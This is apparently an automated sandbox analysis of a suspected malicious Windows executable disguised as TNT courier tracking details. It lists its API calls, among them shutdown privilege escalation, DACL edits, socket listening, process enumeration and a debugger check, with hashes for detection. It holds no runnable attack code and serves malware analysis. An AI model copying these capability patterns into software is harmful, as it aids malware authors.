                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: FolderPath$LocalTime__swprintf
                                      • String ID: %.3d
                                      • API String ID: 3337348382-986655627
                                      • Opcode ID: e729fe0eecd02e77c5ee8deaec4c56456965897f8b2a75efd2bc4ea0d4b88c57
                                      • Instruction ID: 0d137f706e98bab13a4a4c7fcb7914b07bdb7c22a72ec07ab57cd4d47a51df83
                                      • Opcode Fuzzy Hash: e729fe0eecd02e77c5ee8deaec4c56456965897f8b2a75efd2bc4ea0d4b88c57
                                      • Instruction Fuzzy Hash: A6C1EC326101185BD710FBA1DD8AFEE7328EB44701F5045BFF909A60C2DBB99B598F64
                                      Function 00442886 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 135fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • FindFirstFileW.KERNEL32(?,?), ref: 004428A8
                                      • FindNextFileW.KERNEL32(00000000,?), ref: 0044290B
                                      • FindClose.KERNEL32(00000000), ref: 0044291C
                                      • FindClose.KERNEL32(00000000), ref: 00442930
                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 0044294D
                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0044299C
                                      • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 004429BF
                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 004429C9
                                      • FindClose.KERNEL32(00000000), ref: 004429D4
                                        • Part of subcall function 00433C08: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00433C2A
                                      • FindClose.KERNEL32(00000000), ref: 004429E2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                      • String ID: *.*
                                      • API String ID: 2640511053-438819550
                                      • Opcode ID: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                                      • Instruction ID: 696d482812dd8bff2d9106dd2d2144e175b5fe2258968c3fd44c1969776f6f9a
                                      • Opcode Fuzzy Hash: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                                      • Instruction Fuzzy Hash: AD410AB2A001186BDB10EBA5ED45FEF73689F89321F50465BFD0493280D6B8DE558BB8
                                      Function 004333BE Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 86shutdownCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetCurrentProcess.KERNEL32(00000028,?), ref: 004333CE
                                      • OpenProcessToken.ADVAPI32(00000000), ref: 004333D5
                                      • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004333EA
                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0043340E
                                      • GetLastError.KERNEL32 ref: 00433414
                                      • ExitWindowsEx.USER32(?,00000000), ref: 00433437
                                      • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?), ref: 00433466
                                      • SetSystemPowerState.KERNEL32(00000001,00000000), ref: 00433479
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: ProcessSystemToken$AdjustCurrentErrorExitInitiateLastLookupOpenPowerPrivilegePrivilegesShutdownStateValueWindows
                                      • String ID: SeShutdownPrivilege
                                      • API String ID: 2938487562-3733053543
                                      • Opcode ID: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                                      • Instruction ID: ad32a9094aef850e2966724807b7d50af50c82f056daff98c21d8f44207777ad
                                      • Opcode Fuzzy Hash: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                                      • Instruction Fuzzy Hash: F221C971640205ABF7108FA4EC4EF7FB3ACE708702F144569FE09D51D1D6BA5D408765
                                      Function 00446124 Relevance: 16.7, APIs: 11, Instructions: 182COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00436E45
                                        • Part of subcall function 00436E2B: GetLastError.KERNEL32(?,00000000,?), ref: 00436E4F
                                        • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00436E75
                                        • Part of subcall function 00436DF7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00436E12
                                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0044618A
                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004461BE
                                      • GetLengthSid.ADVAPI32(?), ref: 004461D0
                                      • GetAce.ADVAPI32(?,00000000,?), ref: 0044620D
                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00446229
                                      • GetLengthSid.ADVAPI32(?), ref: 00446241
                                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0044626A
                                      • CopySid.ADVAPI32(00000000), ref: 00446271
                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004462A3
                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004462C5
                                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 004462D8
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                      • String ID:
                                      • API String ID: 1255039815-0
                                      • Opcode ID: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                                      • Instruction ID: cbecfdc94e872455e881353a2ef69e95113e06a92746e25f2a634f38edc45108
                                      • Opcode Fuzzy Hash: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                                      • Instruction Fuzzy Hash: C251BC71A00209BBEB10EFA1CD84EEFB778BF49704F01855EF515A7241D6B8DA05CB69
                                      Function 0043305F Relevance: 16.6, APIs: 11, Instructions: 122COMMON
                                      Download Yara Rule
                                      APIs
                                      • __swprintf.LIBCMT ref: 00433073
                                      • __swprintf.LIBCMT ref: 00433085
                                      • __wcsicoll.LIBCMT ref: 00433092
                                      • FindResourceW.KERNEL32(?,?,0000000E), ref: 004330A5
                                      • LoadResource.KERNEL32(?,00000000), ref: 004330BD
                                      • LockResource.KERNEL32(00000000), ref: 004330CA
                                      • FindResourceW.KERNEL32(?,?,00000003), ref: 004330F7
                                      • LoadResource.KERNEL32(?,00000000), ref: 00433105
                                      • SizeofResource.KERNEL32(?,00000000), ref: 00433114
                                      • LockResource.KERNEL32(?), ref: 00433120
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Resource$FindLoadLock__swprintf$Sizeof__wcsicoll
                                      • String ID:
                                      • API String ID: 1158019794-0
                                      • Opcode ID: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                                      • Instruction ID: 48d2d5a3af9b637b7fc6f2c6b5a7fdd3517197a5f8dc2ef3994740021b7ed835
                                      • Opcode Fuzzy Hash: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                                      • Instruction Fuzzy Hash: C741F1322002146BDB10EF65EC84FAB37ADEB89321F00846BFD01C6245E779DA51C7A8
                                      Function 0045A10F Relevance: 16.6, APIs: 11, Instructions: 120clipboardmemoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                      • String ID:
                                      • API String ID: 1737998785-0
                                      • Opcode ID: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                                      • Instruction ID: d84b136cee2c902db59abfe4f82a3f409d39725fe24efd6a62fd8a04edebb5dd
                                      • Opcode Fuzzy Hash: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                                      • Instruction Fuzzy Hash: 334114726001119FC310EFA5EC89B5EB7A4FF54315F00856EF909EB3A1EB75A941CB88
                                      Function 0045D619 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 107COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetErrorMode.KERNEL32(00000001), ref: 0045D627
                                      • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,?), ref: 0045D6B5
                                      • GetLastError.KERNEL32 ref: 0045D6BF
                                      • SetErrorMode.KERNEL32(00000000,?), ref: 0045D751
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Error$Mode$DiskFreeLastSpace
                                      • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                      • API String ID: 4194297153-14809454
                                      • Opcode ID: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                                      • Instruction ID: 1f300c266cb1daf6abeae651b696e439ee3a0372042695327ab67fb83666ce96
                                      • Opcode Fuzzy Hash: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                                      • Instruction Fuzzy Hash: FE418235D00209DFCB10EFA5C884A9DB7B4FF48315F10846BE905AB352D7799A85CB69
                                      Function 0044EB5F Relevance: 12.9, APIs: 3, Strings: 4, Instructions: 643COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: _memmove$_strncmp
                                      • String ID: @oH$\$^$h
                                      • API String ID: 2175499884-3701065813
                                      • Opcode ID: 988809b36a944a9929e300e154a4cfc85b4d4f50dea7e6e4a67b5f519bc2876c
                                      • Instruction ID: 796dcd1322dc9123c5f4e5533c800aedaabe8dca19c5b95ba0af32eff2573e22
                                      • Opcode Fuzzy Hash: 988809b36a944a9929e300e154a4cfc85b4d4f50dea7e6e4a67b5f519bc2876c
                                      • Instruction Fuzzy Hash: 4242E170E04249CFEB14CF69C8806AEBBF2FF85304F2481AAD856AB351D7399946CF55
                                      Function 004652BE Relevance: 12.1, APIs: 8, Instructions: 97networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 0046530D
                                      • WSAGetLastError.WSOCK32(00000000), ref: 0046531C
                                      • bind.WSOCK32(00000000,?,00000010), ref: 00465356
                                      • WSAGetLastError.WSOCK32(00000000), ref: 00465363
                                      • closesocket.WSOCK32(00000000,00000000), ref: 00465377
                                      • listen.WSOCK32(00000000,00000005), ref: 00465381
                                      • WSAGetLastError.WSOCK32(00000000), ref: 004653A9
                                      • closesocket.WSOCK32(00000000,00000000), ref: 004653BD
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: ErrorLast$closesocket$bindlistensocket
                                      • String ID:
                                      • API String ID: 540024437-0
                                      • Opcode ID: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                                      • Instruction ID: 689f190a2b8ca197395c4559ba4ec64c13dad074e2778b61c05f6be918bdb8b0
                                      • Opcode Fuzzy Hash: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                                      • Instruction Fuzzy Hash: A8319331200500ABD310EF25DD89B6EB7A8EF44725F10866EF855E73D1DBB4AC818B99
                                      Function 0044663B Relevance: 11.4, APIs: 1, Strings: 5, Instructions: 895COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: ERCP$VUUU$VUUU$VUUU$XjH
                                      • API String ID: 0-2872873767
                                      • Opcode ID: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                                      • Instruction ID: d175e7d0ae6fb3d700f9da8fb6b70819649eb02c4ceaf458d011f7582104736e
                                      • Opcode Fuzzy Hash: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                                      • Instruction Fuzzy Hash: D772D871A042198BEF24CF58C8807AEB7F1EB42314F25829BD859A7380D7799DC5CF5A
                                      Function 004755C4 Relevance: 10.6, APIs: 7, Instructions: 148processCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 00475608
                                      • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00475618
                                      • __wsplitpath.LIBCMT ref: 00475644
                                        • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                      • _wcscat.LIBCMT ref: 00475657
                                      • __wcsicoll.LIBCMT ref: 0047567B
                                      • Process32NextW.KERNEL32(00000000,?), ref: 004756AB
                                      • CloseHandle.KERNEL32(00000000), ref: 004756BA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                                      • String ID:
                                      • API String ID: 2547909840-0
                                      • Opcode ID: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                                      • Instruction ID: 52239f647ae7113ca4c6e3167181772f82882466072c53a1302db900a9aecbbd
                                      • Opcode Fuzzy Hash: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                                      • Instruction Fuzzy Hash: B3518671900618ABDB10DF55CD85FDE77B8EF44704F1084AAF509AB282DA75AF84CF68
                                      Function 00452492 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 128filesleepCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                      • FindFirstFileW.KERNEL32(?,?), ref: 004524DF
                                      • Sleep.KERNEL32(0000000A), ref: 0045250B
                                      • FindNextFileW.KERNEL32(?,?), ref: 004525E9
                                      • FindClose.KERNEL32(?), ref: 004525FF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Find$File$CloseFirstNextSleep_memmove_wcslen
                                      • String ID: *.*$\VH
                                      • API String ID: 2786137511-2657498754
                                      • Opcode ID: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                                      • Instruction ID: de376bcde865418ddd8e10142a6165d1fec8b8ecf5afc9fd422e88b207ce0255
                                      • Opcode Fuzzy Hash: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                                      • Instruction Fuzzy Hash: 37417F7190021DABDB14DF64CD58AEE77B4AF49305F14445BEC09A3281E678EE49CB98
                                      Function 0041A208 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 58COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • IsDebuggerPresent.KERNEL32 ref: 00421FC1
                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00421FD6
                                      • UnhandledExceptionFilter.KERNEL32(pqI), ref: 00421FE1
                                      • GetCurrentProcess.KERNEL32(C0000409), ref: 00421FFD
                                      • TerminateProcess.KERNEL32(00000000), ref: 00422004
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                      • String ID: pqI
                                      • API String ID: 2579439406-2459173057
                                      • Opcode ID: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                                      • Instruction ID: 2caf929301e55fbdfba35cdc3931bb3174c20cf3198a7c5bb5494214f042e870
                                      • Opcode Fuzzy Hash: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                                      • Instruction Fuzzy Hash: 9E21CDB45392059FCB50DF65FE456483BA4BB68304F5005BBF90987371E7B969818F0D
                                      Function 0043333C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40COMMON
                                      Download Yara Rule
                                      APIs
                                      • __wcsicoll.LIBCMT ref: 00433349
                                      • mouse_event.USER32(00000800,00000000,00000000,00000078,00000000), ref: 0043335F
                                      • __wcsicoll.LIBCMT ref: 00433375
                                      • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 0043338B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
